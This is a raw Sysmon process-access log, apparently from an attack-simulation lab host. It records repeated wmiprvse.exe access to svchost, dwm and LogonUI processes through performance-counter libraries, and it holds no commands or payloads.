21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150997Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150996Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150995Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150994Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150993Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150992Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150991Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150990Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1200-00000000D101}960C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150989Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150988Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1100-00000000D101}968C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150987Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150986Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1000-00000000D101}940C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150985Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150984Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0F00-00000000D101}928C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000150983Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:41.517{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-0E00-00000000D101}880C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+37283|C:\Windows\SYSTEM32\pdh.dll+34d8c|C:\Windows\SYSTEM32\pdh.dll+34f5a|C:\Windows\System32\wbem\WmiPerfClass.dll+f478|C:\Windows\System32\wbem\WmiPerfClass.dll+fd0a|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6 10341000x8000000000000000150982Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 